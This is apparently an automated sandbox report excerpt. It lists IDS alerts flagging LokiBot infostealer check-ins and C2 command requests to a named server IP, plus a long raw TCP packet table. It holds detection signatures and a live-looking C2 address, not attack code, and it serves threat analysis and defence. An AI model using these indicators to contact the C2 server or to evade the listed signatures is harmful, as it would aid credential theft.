2024-10-03T09:22:38.687921+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.11	64442	45.149.241.169	80	TCP
2024-10-03T09:22:38.687921+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.11	64442	45.149.241.169	80	TCP
2024-10-03T09:22:38.692949+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.11	64442	TCP
2024-10-03T09:22:38.836712+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.11	64443	45.149.241.169	80	TCP
2024-10-03T09:22:38.836712+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.11	64443	45.149.241.169	80	TCP
2024-10-03T09:22:38.836712+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.11	64443	45.149.241.169	80	TCP
2024-10-03T09:22:39.523859+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.11	64443	45.149.241.169	80	TCP
2024-10-03T09:22:39.523859+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.11	64443	45.149.241.169	80	TCP
2024-10-03T09:22:39.530058+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.11	64443	TCP
2024-10-03T09:22:39.681925+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.11	64444	45.149.241.169	80	TCP
2024-10-03T09:22:39.681925+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.11	64444	45.149.241.169	80	TCP
2024-10-03T09:22:39.681925+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.11	64444	45.149.241.169	80	TCP
2024-10-03T09:22:40.350489+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.11	64444	45.149.241.169	80	TCP
2024-10-03T09:22:40.350489+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.11	64444	45.149.241.169	80	TCP
2024-10-03T09:22:40.355345+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.11	64444	TCP
2024-10-03T09:22:40.614660+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.11	64445	45.149.241.169	80	TCP
2024-10-03T09:22:40.614660+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.11	64445	45.149.241.169	80	TCP
2024-10-03T09:22:40.614660+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.11	64445	45.149.241.169	80	TCP
2024-10-03T09:22:41.352352+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.11	64445	45.149.241.169	80	TCP
2024-10-03T09:22:41.352352+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.11	64445	45.149.241.169	80	TCP
2024-10-03T09:22:41.357295+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.11	64445	TCP
2024-10-03T09:22:41.558183+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.11	64446	45.149.241.169	80	TCP
2024-10-03T09:22:41.558183+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.11	64446	45.149.241.169	80	TCP
2024-10-03T09:22:41.558183+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.11	64446	45.149.241.169	80	TCP
2024-10-03T09:22:42.187830+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.11	64446	45.149.241.169	80	TCP
2024-10-03T09:22:42.187830+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.11	64446	45.149.241.169	80	TCP
2024-10-03T09:22:42.192690+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.11	64446	TCP
2024-10-03T09:22:42.344416+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.11	64447	45.149.241.169	80	TCP
2024-10-03T09:22:42.344416+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.11	64447	45.149.241.169	80	TCP
2024-10-03T09:22:42.344416+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.11	64447	45.149.241.169	80	TCP
2024-10-03T09:22:43.088359+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.11	64447	45.149.241.169	80	TCP
2024-10-03T09:22:43.088359+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.11	64447	45.149.241.169	80	TCP
2024-10-03T09:22:43.095306+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.11	64447	TCP
2024-10-03T09:22:43.251789+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.11	64448	45.149.241.169	80	TCP
2024-10-03T09:22:43.251789+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.11	64448	45.149.241.169	80	TCP
2024-10-03T09:22:43.251789+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.11	64448	45.149.241.169	80	TCP
2024-10-03T09:22:43.911035+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.11	64448	45.149.241.169	80	TCP
2024-10-03T09:22:43.911035+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.11	64448	45.149.241.169	80	TCP
2024-10-03T09:22:43.915998+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.11	64448	TCP
2024-10-03T09:22:44.067474+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.11	64449	45.149.241.169	80	TCP
2024-10-03T09:22:44.067474+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.11	64449	45.149.241.169	80	TCP
2024-10-03T09:22:44.067474+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.11	64449	45.149.241.169	80	TCP
2024-10-03T09:22:44.840138+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.11	64449	45.149.241.169	80	TCP
2024-10-03T09:22:44.840138+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.11	64449	45.149.241.169	80	TCP
2024-10-03T09:22:44.845008+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.11	64449	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 3, 2024 09:20:40.672699928 CEST	49710	443	192.168.2.11	188.114.96.3
Oct 3, 2024 09:20:40.672744036 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:40.672816992 CEST	49710	443	192.168.2.11	188.114.96.3
Oct 3, 2024 09:20:40.683554888 CEST	49710	443	192.168.2.11	188.114.96.3
Oct 3, 2024 09:20:40.683572054 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:41.147365093 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:41.147464037 CEST	49710	443	192.168.2.11	188.114.96.3
Oct 3, 2024 09:20:41.151506901 CEST	49710	443	192.168.2.11	188.114.96.3
Oct 3, 2024 09:20:41.151516914 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:41.151813984 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:41.162029028 CEST	49710	443	192.168.2.11	188.114.96.3
Oct 3, 2024 09:20:41.207395077 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:41.801786900 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:41.852828026 CEST	49710	443	192.168.2.11	188.114.96.3
Oct 3, 2024 09:20:43.034029961 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:43.034097910 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:43.034127951 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:43.034145117 CEST	49710	443	192.168.2.11	188.114.96.3
Oct 3, 2024 09:20:43.034152985 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:43.034190893 CEST	49710	443	192.168.2.11	188.114.96.3
Oct 3, 2024 09:20:43.034198046 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:43.087167978 CEST	49710	443	192.168.2.11	188.114.96.3
Oct 3, 2024 09:20:43.126534939 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:43.126604080 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:43.126633883 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:43.126686096 CEST	49710	443	192.168.2.11	188.114.96.3
Oct 3, 2024 09:20:43.126694918 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:43.126748085 CEST	49710	443	192.168.2.11	188.114.96.3
Oct 3, 2024 09:20:43.234178066 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:43.234283924 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:43.234323978 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:43.234361887 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:43.234448910 CEST	49710	443	192.168.2.11	188.114.96.3
Oct 3, 2024 09:20:43.234466076 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:43.234577894 CEST	49710	443	192.168.2.11	188.114.96.3
Oct 3, 2024 09:20:43.234586000 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:43.234674931 CEST	49710	443	192.168.2.11	188.114.96.3
Oct 3, 2024 09:20:43.359283924 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:43.359345913 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:43.359415054 CEST	49710	443	192.168.2.11	188.114.96.3
Oct 3, 2024 09:20:43.359427929 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:43.415311098 CEST	49710	443	192.168.2.11	188.114.96.3
Oct 3, 2024 09:20:43.447220087 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:43.447319031 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:43.447375059 CEST	49710	443	192.168.2.11	188.114.96.3
Oct 3, 2024 09:20:43.447380066 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:43.447395086 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:43.447432995 CEST	49710	443	192.168.2.11	188.114.96.3
Oct 3, 2024 09:20:43.538100004 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:43.538161993 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:43.538186073 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:43.538207054 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:43.538211107 CEST	49710	443	192.168.2.11	188.114.96.3
Oct 3, 2024 09:20:43.538230896 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:43.538256884 CEST	49710	443	192.168.2.11	188.114.96.3
Oct 3, 2024 09:20:43.587136984 CEST	49710	443	192.168.2.11	188.114.96.3
Oct 3, 2024 09:20:43.587148905 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:43.613109112 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:43.613172054 CEST	49710	443	192.168.2.11	188.114.96.3
Oct 3, 2024 09:20:43.613188028 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:43.615318060 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:43.615371943 CEST	49710	443	192.168.2.11	188.114.96.3
Oct 3, 2024 09:20:43.615379095 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:43.665298939 CEST	49710	443	192.168.2.11	188.114.96.3
Oct 3, 2024 09:20:43.713967085 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:43.714024067 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:43.714087009 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:43.714092970 CEST	49710	443	192.168.2.11	188.114.96.3
Oct 3, 2024 09:20:43.714123011 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:43.714163065 CEST	49710	443	192.168.2.11	188.114.96.3
Oct 3, 2024 09:20:43.714211941 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:43.759073973 CEST	49710	443	192.168.2.11	188.114.96.3
Oct 3, 2024 09:20:43.759114981 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:43.805934906 CEST	49710	443	192.168.2.11	188.114.96.3
Oct 3, 2024 09:20:43.846018076 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:43.849173069 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:43.849183083 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:43.849204063 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:43.849261045 CEST	49710	443	192.168.2.11	188.114.96.3
Oct 3, 2024 09:20:43.849281073 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:43.849328995 CEST	49710	443	192.168.2.11	188.114.96.3
Oct 3, 2024 09:20:43.897768021 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:43.897777081 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:43.897895098 CEST	49710	443	192.168.2.11	188.114.96.3
Oct 3, 2024 09:20:43.897911072 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:43.897964954 CEST	49710	443	192.168.2.11	188.114.96.3
Oct 3, 2024 09:20:44.023113012 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:44.023123980 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:44.023159981 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:44.023279905 CEST	49710	443	192.168.2.11	188.114.96.3
Oct 3, 2024 09:20:44.023312092 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:44.023374081 CEST	49710	443	192.168.2.11	188.114.96.3
Oct 3, 2024 09:20:44.118278027 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:44.118288040 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:44.118320942 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:44.118398905 CEST	49710	443	192.168.2.11	188.114.96.3
Oct 3, 2024 09:20:44.118427038 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:44.118442059 CEST	49710	443	192.168.2.11	188.114.96.3
Oct 3, 2024 09:20:44.118480921 CEST	49710	443	192.168.2.11	188.114.96.3
Oct 3, 2024 09:20:44.119322062 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:44.119381905 CEST	49710	443	192.168.2.11	188.114.96.3
Oct 3, 2024 09:20:44.228482962 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:44.228574038 CEST	49710	443	192.168.2.11	188.114.96.3
Oct 3, 2024 09:20:44.230460882 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:44.230504036 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:44.230540991 CEST	49710	443	192.168.2.11	188.114.96.3
Oct 3, 2024 09:20:44.230551958 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:44.230607986 CEST	49710	443	192.168.2.11	188.114.96.3
Oct 3, 2024 09:20:44.317517042 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:44.317709923 CEST	49710	443	192.168.2.11	188.114.96.3
Oct 3, 2024 09:20:44.317814112 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:44.317883015 CEST	49710	443	192.168.2.11	188.114.96.3
Oct 3, 2024 09:20:44.317890882 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:44.368488073 CEST	49710	443	192.168.2.11	188.114.96.3
Oct 3, 2024 09:20:44.410017967 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:44.410032034 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:44.410145044 CEST	49710	443	192.168.2.11	188.114.96.3
Oct 3, 2024 09:20:44.536700964 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:44.536720991 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:44.536851883 CEST	49710	443	192.168.2.11	188.114.96.3
Oct 3, 2024 09:20:44.536864996 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:44.536915064 CEST	49710	443	192.168.2.11	188.114.96.3
Oct 3, 2024 09:20:44.558695078 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:44.558783054 CEST	49710	443	192.168.2.11	188.114.96.3
Oct 3, 2024 09:20:44.616894007 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:44.616945982 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:44.616993904 CEST	49710	443	192.168.2.11	188.114.96.3
Oct 3, 2024 09:20:44.617008924 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:44.617036104 CEST	49710	443	192.168.2.11	188.114.96.3
Oct 3, 2024 09:20:44.626147032 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:44.626192093 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:44.626241922 CEST	49710	443	192.168.2.11	188.114.96.3
Oct 3, 2024 09:20:44.626250982 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:44.626281977 CEST	49710	443	192.168.2.11	188.114.96.3
Oct 3, 2024 09:20:44.680938005 CEST	49710	443	192.168.2.11	188.114.96.3
Oct 3, 2024 09:20:44.711273909 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:44.711288929 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:44.711401939 CEST	49710	443	192.168.2.11	188.114.96.3
Oct 3, 2024 09:20:44.711421013 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:44.711432934 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:44.711481094 CEST	49710	443	192.168.2.11	188.114.96.3
Oct 3, 2024 09:20:44.711497068 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:44.711549044 CEST	49710	443	192.168.2.11	188.114.96.3
Oct 3, 2024 09:20:44.827578068 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:44.827692986 CEST	49710	443	192.168.2.11	188.114.96.3
Oct 3, 2024 09:20:44.913237095 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:44.913834095 CEST	49710	443	192.168.2.11	188.114.96.3
Oct 3, 2024 09:20:44.913849115 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:44.914011002 CEST	49710	443	192.168.2.11	188.114.96.3
Oct 3, 2024 09:20:44.923367023 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:44.923441887 CEST	49710	443	192.168.2.11	188.114.96.3
Oct 3, 2024 09:20:44.923604965 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:44.923743010 CEST	49710	443	192.168.2.11	188.114.96.3
Oct 3, 2024 09:20:44.924036980 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:44.924210072 CEST	49710	443	192.168.2.11	188.114.96.3
Oct 3, 2024 09:20:45.035152912 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:45.035235882 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:45.035332918 CEST	49710	443	192.168.2.11	188.114.96.3
Oct 3, 2024 09:20:45.035351038 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:45.035406113 CEST	49710	443	192.168.2.11	188.114.96.3
Oct 3, 2024 09:20:45.035491943 CEST	49710	443	192.168.2.11	188.114.96.3
Oct 3, 2024 09:20:45.038309097 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:45.038459063 CEST	49710	443	192.168.2.11	188.114.96.3
Oct 3, 2024 09:20:45.113161087 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:45.113207102 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:45.113363981 CEST	49710	443	192.168.2.11	188.114.96.3
Oct 3, 2024 09:20:45.113434076 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:45.113455057 CEST	49710	443	192.168.2.11	188.114.96.3
Oct 3, 2024 09:20:45.113538027 CEST	49710	443	192.168.2.11	188.114.96.3
Oct 3, 2024 09:20:45.113823891 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:45.113893032 CEST	49710	443	192.168.2.11	188.114.96.3
Oct 3, 2024 09:20:45.113900900 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:45.114099026 CEST	49710	443	192.168.2.11	188.114.96.3
Oct 3, 2024 09:20:45.253374100 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:45.253437042 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:45.253513098 CEST	49710	443	192.168.2.11	188.114.96.3
Oct 3, 2024 09:20:45.253534079 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:45.253573895 CEST	49710	443	192.168.2.11	188.114.96.3
Oct 3, 2024 09:20:45.306171894 CEST	49710	443	192.168.2.11	188.114.96.3
Oct 3, 2024 09:20:45.313536882 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:45.313549042 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:45.313584089 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:45.313626051 CEST	49710	443	192.168.2.11	188.114.96.3
Oct 3, 2024 09:20:45.313637972 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:45.313654900 CEST	49710	443	192.168.2.11	188.114.96.3
Oct 3, 2024 09:20:45.368489027 CEST	49710	443	192.168.2.11	188.114.96.3
Oct 3, 2024 09:20:45.420361996 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:45.420377016 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:45.420416117 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:45.420445919 CEST	49710	443	192.168.2.11	188.114.96.3
Oct 3, 2024 09:20:45.420449972 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:45.420468092 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:45.420489073 CEST	49710	443	192.168.2.11	188.114.96.3
Oct 3, 2024 09:20:45.420496941 CEST	49710	443	192.168.2.11	188.114.96.3
Oct 3, 2024 09:20:45.462271929 CEST	49710	443	192.168.2.11	188.114.96.3
Oct 3, 2024 09:20:45.549480915 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:45.549494028 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:45.549535990 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:45.549581051 CEST	49710	443	192.168.2.11	188.114.96.3
Oct 3, 2024 09:20:45.549598932 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:45.549619913 CEST	49710	443	192.168.2.11	188.114.96.3
Oct 3, 2024 09:20:45.586774111 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:45.586875916 CEST	49710	443	192.168.2.11	188.114.96.3
Oct 3, 2024 09:20:45.586884975 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:45.586980104 CEST	49710	443	192.168.2.11	188.114.96.3
Oct 3, 2024 09:20:45.589699984 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:45.589710951 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:45.589742899 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:45.589787960 CEST	49710	443	192.168.2.11	188.114.96.3
Oct 3, 2024 09:20:45.589796066 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:45.589840889 CEST	49710	443	192.168.2.11	188.114.96.3
Oct 3, 2024 09:20:45.634145021 CEST	49710	443	192.168.2.11	188.114.96.3
Oct 3, 2024 09:20:45.663816929 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:45.663826942 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:45.663881063 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:45.663912058 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:45.664010048 CEST	49710	443	192.168.2.11	188.114.96.3
Oct 3, 2024 09:20:45.664030075 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:45.664104939 CEST	49710	443	192.168.2.11	188.114.96.3
Oct 3, 2024 09:20:45.712156057 CEST	49710	443	192.168.2.11	188.114.96.3
Oct 3, 2024 09:20:45.774667025 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:45.774760962 CEST	49710	443	192.168.2.11	188.114.96.3
Oct 3, 2024 09:20:45.780067921 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:45.780082941 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:45.780128002 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:45.780194998 CEST	49710	443	192.168.2.11	188.114.96.3
Oct 3, 2024 09:20:45.780194998 CEST	49710	443	192.168.2.11	188.114.96.3
Oct 3, 2024 09:20:45.780206919 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:45.780278921 CEST	49710	443	192.168.2.11	188.114.96.3
Oct 3, 2024 09:20:45.861723900 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:45.861736059 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:45.861790895 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:45.861824036 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:45.861912966 CEST	49710	443	192.168.2.11	188.114.96.3
Oct 3, 2024 09:20:45.861927032 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:45.861947060 CEST	49710	443	192.168.2.11	188.114.96.3
Oct 3, 2024 09:20:45.904886007 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:45.904938936 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:45.905016899 CEST	49710	443	192.168.2.11	188.114.96.3
Oct 3, 2024 09:20:45.905029058 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:45.905076027 CEST	49710	443	192.168.2.11	188.114.96.3
Oct 3, 2024 09:20:45.905168056 CEST	49710	443	192.168.2.11	188.114.96.3
Oct 3, 2024 09:20:45.907459974 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:45.907473087 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:45.907511950 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:45.907553911 CEST	49710	443	192.168.2.11	188.114.96.3
Oct 3, 2024 09:20:45.907562971 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:45.907720089 CEST	49710	443	192.168.2.11	188.114.96.3
Oct 3, 2024 09:20:46.039633989 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:46.039824963 CEST	49710	443	192.168.2.11	188.114.96.3
Oct 3, 2024 09:20:46.047147989 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:46.047199965 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:46.047317982 CEST	49710	443	192.168.2.11	188.114.96.3
Oct 3, 2024 09:20:46.047317982 CEST	49710	443	192.168.2.11	188.114.96.3
Oct 3, 2024 09:20:46.047343969 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:46.047399044 CEST	49710	443	192.168.2.11	188.114.96.3
Oct 3, 2024 09:20:46.088020086 CEST	443	49710	188.114.96.3	192.168.2.11
Oct 3, 2024 09:20:46.088051081 CEST	443	49710	188.114.96.3	192.168.2.11
